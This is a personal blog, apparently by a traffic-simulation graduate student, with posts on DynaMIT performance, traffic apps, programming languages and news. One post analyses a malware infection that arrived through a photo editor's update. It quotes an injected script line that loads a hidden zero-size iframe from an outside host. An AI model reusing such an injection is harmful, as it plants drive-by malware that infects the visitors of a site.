INRIX TRAFFIC! for iPhone still has a long way to go

i've been experimenting with this app for a while. It does bring some of the basic traffic real-time/predictive information, but mostly limited on freeways.  It appears to a prototype of next generation traffic data provider/collector --  yes, it could use the information your cell phone provides. Here is what its website claims:

"Every driver in the network anonymously and automatically sends their speed, position and heading to INRIX Smart Driver Network servers. INRIX intelligently combines your information with real-time data from other drivers and traditional road sensors and then instantaneously updates the traffic maps on INRIX TRAFFIC! Everyone in the network benefits from up-to-the-minute, accurate traffic information with superior road coverage. "

To really make this work, there are still a lot to do.  One needs large sample sizes to ensure the quality is reliable, and some sort of smart algorithms to make the best out of the data. In addition, it could be more useful to users if it can be combined with a navigation system, or at least has some sort of voice guidance on potential congestion based on our current location/speed. And last but not the least, the battery life of the phone could kill this sort of app -- not sure about others, but i'm quite concern about how fast the battery drains when location service is left on...
posted by wenyang with 0 Comments

What others think about Java and C++

After using Java for production code for a while, I realize that C++ is still my favorite. I admit that Java has some nice features, but it has not yet met my expectation. I am somewhat reluctant to some negative things about Java at this moment, as I still think it would be unfair to do so given my C++ background and limited Java experiences. Apparently each language has its strengths and weaknesses. But I do agree with Bruce Eckel who pointed out, in his post The Positive Legacy of C++ and Java, that someone was not doing his/her homework when making decisions about Java. It is interesting to see how others, especially those with years of experiences in both languages, to compare the duo.
posted by wenyang with 0 Comments

First update since last summer

Have been wondering if i can keep this blog after graduation. Not sure if i can find another place and move posts conveniently.
posted by wenyang with 0 Comments

Last lecture of Randy Pausch

I was supposed to work on my thesis and the TRB paper tonight. But I ended up watching this video "Really Achieving Your Childhood Dreams" on YouTube for more than one hour. If there is only one video on YouTube I could recommend, this is it. 

Randy Pausch, a professor and great teacher of the Carnegie Mellon University, passed away a few days ago. He was 47.

posted by wenyang with 0 Comments

Traffic Simulation Workshop (Graz, 2008)

Just came back from Graz, Austria this Thursday. The 2008 Traffic Simulation Workshop went quite well, IMO. Some presentations are quite interesting (and I hope mine is among one of them).  Moreover, I have also got a few good comments, which should be addressed in my forth-coming thesis.

Graz seems to be a nice small town. Thanks to the workshop organizers, especially Prof. Martin Fellendorf, we participated a hiking trip, a guided city walk, a delicious dinner at the hilltop restaurant of Schlossberg (with amazing views of the city), and various other interesting activities.

I actually arrived Graz on June 29th, the day on which the final game of Euro 2008 was played at Vienna. It was about 2.5 hours away from Graz by car. Two people I knew actually went to Vienna and managed to watch the game live at the stadium! What an experience!


posted by wenyang with 0 Comments

MIT Donation Drive for the Sichuan Earthquake

Got an email from CSSA list -- CSSA is trying to organize donation for the Earthquake-Hit Areas in China. Detail is available here.   We will pray for those caught in the quake and hope we can save as many as possible.

Today I was told that one of my teachers at Tsinghua (Civil Engineering) had gone to Sichuan to assist the examination and evaluation of buiding structures there, as an effort to make sure they are safe.



posted by wenyang with 1 Comments

Parallel DynaMIT runs on Athena

For a long time I've been searching for more machines to do experiments on parallel simulation for my case studies. Our lab does not have that much PCs, and some of them are heavily used by other researchers. I tried to contact MIT academic computing for help,  but my emails have been ignored by far. I keep looking, and finally here comes a chance: the Athena clusters.

Athena clusters have many unused machines during this week, the spring break. On Monday, after some trial-and-error efforts, I managed to make my parallel DynaMIT run on Athena. If the results are good, I might be able to finish my case studies in time.   It is not as convenient as  doing experiments in the lab -- one cannot do this remotely; I need to keep an eye on the machines while DynaMIT's running. Anyway, this is better than nothing.

posted by wenyang with 0 Comments

Google and transportation information

Yesterday I read about two articles on Google's impact on transportation. One was "Google's Online Maps Gets New Jersey Commuters On Time", the other, "Observer Sees Google's Future In Transportation Routing". Both were available on InformationWeek

The NJ TRANSIT story is somewhat expected. With the power of Google Maps and Google Earth, Google's providing information on transportation systems is of no surprise to me.  If Android becomes more acceptable to handset manufacturers and the users (which I believe is just a matter of time), more and more travelers might be able to get (near) real-time information from Google or maybe other travel information providers (such as TrafficGauge, Inrix, Traffic.com, SmarTraveler and traditional media companies) as well.

Nowadays getting near real-time data is much easier than before. GPS-equipped probe vehicles, for example, have already been used in many places in the US, China, and Europe, etc. Such data is very useful under general conditions. When sufficient historical data is available, it is relatively easy to optimize routing for a normal situation. The chanllange remains, however, when an (unexpected) incident occurs and it changes the traffic pattern significantly. In that case, having real-time information could still be very helpful. But what if most people on the road have access to such information? If all (or a significant fraction) of them change their behavior (e.g., route choice), then the situation might be even worse, and even real-time information may not be able to tell what is the best route because everything is so dynamic -- the road condition at the time one has to make a decision may be different from the condition he/she will eventually experience. In a non-recurrent situation like this, purely statistical methods might not be able to provide accurate and relevant information for travelers. A suitable model (such as DynaMIT) that can generate consistent anticipatory information would be more useful. It has built-in capability to handle drivers' "overaction" to the travel information in this situation.

I would say the transportation routing patent by Google is somewhat unexpected. After quickly skimming through the patent, I had the impression that the patent is more about how to process the data and provide it to users via wireless devices. How they obtain the data and what kind of data could be used is not detailed. Anyway, this reminded me a meeting last week with Dr. Ramachandran Ramjee, who is currently a Senior Researcher at Microsoft Research, India. He has some interesting ideas on how to collect traffic data from Smart Phones.

I believe in maybe a few years we will be able to collect pretty good (and huge amount of) traffic data from cell phones and use it for travler  information.  If I know some company is working on this now, I would be very interested to work for them. :-)


posted by wenyang with 0 Comments

The DynaMIT runtime figure

For background information about this figure, please see the previous post "Improving DynaMIT runtime performance".
 DynaMIT runtime  on the Los Angeles network (single CPU)
posted by wenyang with 0 Comments

Improving DynaMIT runtime performance

In my previous post, I mentioned that I had been working on the case studies lately. Doing profiling experiments could be tedious. One needs to run many scenarios with different binaries and possibly different sets of parameters; results also need to be processed and archived. I would usually write a shell script and let the machines do the batch jobs, and free myself to other works.

 While waiting for some results just now, I went over a log file of my previous profiling experiments. It was about DynaMIT runtime on a single processor machine. Then I created a figure, and found some interesting observations. The figure is so simple that I hope the following “text” version would do the same trick. Here it is:

Date      |                          Runtime     (seconds)
Dec, 2006 | ************************************
(1067)
Mar, 2007 | ********************                
(592)
Oct, 2007 | *************                       
(384)
Jan, 2008 | *********                           
(265)   

 
 
For a sophisticated system like DynaMIT, usually one can improve its efficiency in two directions.

  •  One is the “scientific” way, which is to find better models and algorithms. This part is often difficult, but would bring dramatic changes to the runtime if we manage to do it. In my research, two major advances were introduced: utilizing sparse matrices in OD estimation, and use smart algorithms to get the most out of parallel simulation. Since I have not yet finished all my case studies, this post is not about it.
  • The other is the “engineering” way -- use whatever practical to solve the problem. For example, do profiling studies to find bottlenecks before doing any optimization, avoid frequently allocating and de-allocating memory, avoid re-calculation, save intermediate results for future use, and use hash judiciously. The improvement shown in the figure is primarily due to this part.

The figure indicates a few surprising facts. Back in the end of 2006, it took about 18 minutes to run this scenario, but at the beginning of 2008, it dropped to four and a half minutes, or about 1/4 of the original. Another interesting observation is also unexpected: I have been able to reduce the runtime by roughly 1/3 of the original almost every four months for the past year, taking into account the fact that I did not work on it during the whole summer of 2007.

 Frankly, I do not expect such a trend would continue for long.  Most of the improvements reflected in those tests were achieved by better “engineering” approaches. I spent a lot of efforts to revise the bad designs or inefficient implementations inherited from the old version I took over. There are still rooms for further improvement, but my hunch is it would probably give us no more than 20% gain unless somebody spends tremendous effort on it.

That’s actually one of the reasons why I chose to work on the scalability issues. Single CPU configurations do not scale well. Parallel processing may be the way to go. I already have some promising results. Now the problem is where I can find a cluster with 20 or more machines to finish my case study.


Here is some background about the figure, only for those who are interested:

  • The figure here shows how much time DynaMIT needs to run a simulation of the Los Angeles for a six-hour morning peak period on a typical day.
  • All tests were performed on our server with an Intel Pentium 4 CPU of 3.6 GHz. The server has 2 GB main memory, but it is not critical here because the simulation would need less than 200 MB for this network.
  • The server runs on Fedora Core 3 (Heidelberg). In all cases DynaMIT was compiled by GNU g++ 3.4.4 with “-O3” flag and the debugging and profiling code was included.
  • The runtime was collected from the “user CPU time” returned by the “time” command. (The difference between the elapsed real time and the user CPU time was generally between 20~25 seconds.)
  • In each test the run were replicated for at least five times and the averaged runtime was used. (The deviation was not significant, though.)  
  • While DynaMIT is a stochastic system and random numbers are used in the simulation, all these tests have the same fixed seed for the random number generator. This makes the results replicable.
  • The scenario we used in those tests was the simulation on a calibrated network of the south park area in downtown LA, California. Archival real sensor data from the field was used in a simulate environment to mimic the real-time data feed.
  • DynaMIT operates in a rolling-horizon mode for real-time (on-line) applications. In the runtime tests we chose to use 15-minute estimation intervals, which were deemed appropriate for this network. Every 15 minutes, sensor data for the past 15 minutes was made available to DynaMIT, which fused it with historical information and tried to generate an unbiased estimate of the state of the whole network. While in a real case study we often use three or more iterations for this state estimation stage, in this run-time tests we only used one estimation iteration per horizon. For each horizon, when the state estimation finished, two 30-minute state prediction iterations were run to generate predictive travel time information and route guidance. Consequently, for each 15-minute interval in our simulation period, we would need to simulate 15+30*2=75 minutes (combining the estimation and prediction stages).
  • My wiki has more details about the LA network, and a flash demo made a long time ago (for other purposes).

posted by wenyang with 1 Comments

Another committee meeting finished

It's been a long time since my last post. I have been quite busy for the past month, and have just finished my 8th committee meeting. I can't really say when I can defense yet, but there is a good chance it would be this summer. Everything that has a beginning has an end, right?

 
My recent work is about case studies using DynaMIT to demonstrate how we could use scalable methods to speed up real-time Dynamic Traffic Assignment (DTA) systems, which are often envisioned to be the key component for Advanced Traveler Information Systems (ATIS). Such case studies are not easy because one need to deal with lots of practical issues, which were simply ignored or barely mentioned in existing literatures. I have run into so many existing approaches that were only tested on small networks with cleaned data, and most of them would probably never work on real-time applications for large-scale problems. (Well, ironically, many of them do put the "real-time" tag on themselves and get published.)

 
For my studies, analyzing the complexity of algorithms is not enough; I also need to understand how the hardware works and find the bottlenecks in the whole system from profiling studies. Moreover, to really demonstrate my ideas, I would also need to implement my approach in a decent way, and test it on large networks. In one of my early committee meetings, after hearing my presentation, a professor commented: "You are the first (student) to complain about a network is too small." What can I say? Of course I know using large networks for case study brings more trouble – more than just taking longer time to run; but if all we do is for a small network, why would one need that much “fire power”?

posted by wenyang with 2 Comments

Wt: a C++ Web Toolkit

I just read about an introduction of Wt, by Wim Dumon and Koen Deforche, available at Dr. Dobb's. This library can let programmers write modern web applications using a familiar C++ GUI programming style. The interesting thing about Wt is it would renders the C++ applications to the web browser.  The authors claimed that Wt supports AJAX and provides greater efficiency and a smaller footprint than Java or Ruby solutions.  It seems like a good option for those who are comfortable with C++ GUI programming and would not invest extra efforts to switch to other languages. :-)

This library is released under a dual-license strategy (kind of similar to Qt): one can choose GNU GPL (for free, of course), or a commercial license for a yearly subscription fee.


posted by wenyang with 0 Comments

Backdoor opened by software automatic update

Two days ago I accidently ran into a backdoor opened by a software update function. Malicious scripts and executables were downloaded to my laptop... I believe the problem is not only inside the software itself, but also related to Internet Explorer or related Windows security mechanism.

I was trying a photo editing software named nEOiMAGING and suddenly it crashed, with some messages indicating a problem caused by "a.exe". It looked suspicious, doesn't it? I had used that software for a few times and it nevered happend before. Where was the problem originated?

So I opened Process Explorer and found the file at C:\WINDOWS\system32\a.exe (about 14k). Anytime one file with such a "simple" name in a system directory would almost always mean a trojan, virus, or any other malware. I had to put down my normal work to take a careful look on it.

Process Explorer also showed that this file was started by cmd.exe and the starting directory was exactly where I had nEOiMAGING installed in. It seemed indeed it's caused by this software. Then I did some tests. Normally I should not test them on my machine, as there might be a chance something could go wrong and mess up my system. But I did not have a virtual machine or sandbox to play with, and most of my files were backup regularly. So I took a risky approach and ran the software again directly on my laptop. This time, I opened Process Monitor and logged every relevant events.

If I disable my internet connection, then the crash does not happen. But I was able to replicate the same crash when I was connected. Process Monitor showed me how a.exe sneaked into my system. It was copied from a file name "dod.exe" in the "Temporary Internet Files" folder. Then I also found some malicious scripts and executables in that directory and its subdir.

By then it became clear that the malware was downloaded via the connection opened by nEOiMAGING. I tried to look for an option to turn off the automatic update service in that software, but could not find one. I guessed it was hard-coded in. Had it been an open-source software, I could have fixed it by myself, or somebody else could have had it fixed long before. That's another reason I prefer to use free software (http://www.gnu.org/philosophy/free-sw.html) or open-source software, if I have a choice.

The final thing I tried to look at was why this did not happen before -- I had used the same software the day before but it was not causing any trouble at that time. The script found in my Temporary Internet Files folder indicated they were from some website and there were code like this
(WARNING: do NOT connect to the site below!)

document.write("<iframe src=http://xxx.hao1680.com/xx.htm?id=017 width=0 height=0></iframe>")

I guessed the update page requested by nEOiMAGING was somehow cracked, and malicious code was added via iframe.

I did not have the time to figure out the details, but it appeared to me this should be a backdoor or exploit of Windows that such a script could download malware to my computer.

This is a little bit disturbing -- it seems even if you do not use IE, the exploits are still able to bite you via other softwares that happen to use the internet connection somehow. One has no choice in this issue, unlike web-browsing, when one could choose the somewhat more "secure" Firefox. The possible solutions are (1) stop using that software, or (2) use a firewall to block the access.

posted by wenyang with 1 Comments

iPhone and the wireless market

Today I came across this fascinating article "The Untold Story: How the iPhone Blew Up the Wireless Industry" by Fred Vogelstein (WIRED Magazine: issue 16.02).

One interesting observation is how the introduction of iPhone changes the the wireless business model. In the past, carriers treated their networks as "precious resources", and handsets as "worthless commodities". The reason was "by subsidizing the purchase of cheap phones, carriers made it easier for new customers to sign up -- and get roped into long-term contracts that ensured a reliable revenue stream." During the past few months, however, iPhone has successfully attracted so many customers to AT&T, which reaps significant profit margins over it data services (as compared to the voice business). Carriers start to feel the need to change.

When people compare the US wireless market with the one in China, researchers and experts from China often call for some sort of regulation/deregulation (yet by far they have been unsuccessful to lobby the policy-makers) to break the monopoly, open the market and introduce more carriers and competions, for the benefit of the end users. The US market was always one typical example people would cite. Ironically, this time the US market is moving towards a situation where its Chinese counterpart was born with -- the carriers open their network to (almost) all cell phone manufacturers as long as they meets the national standard requirement.
posted by wenyang with 0 Comments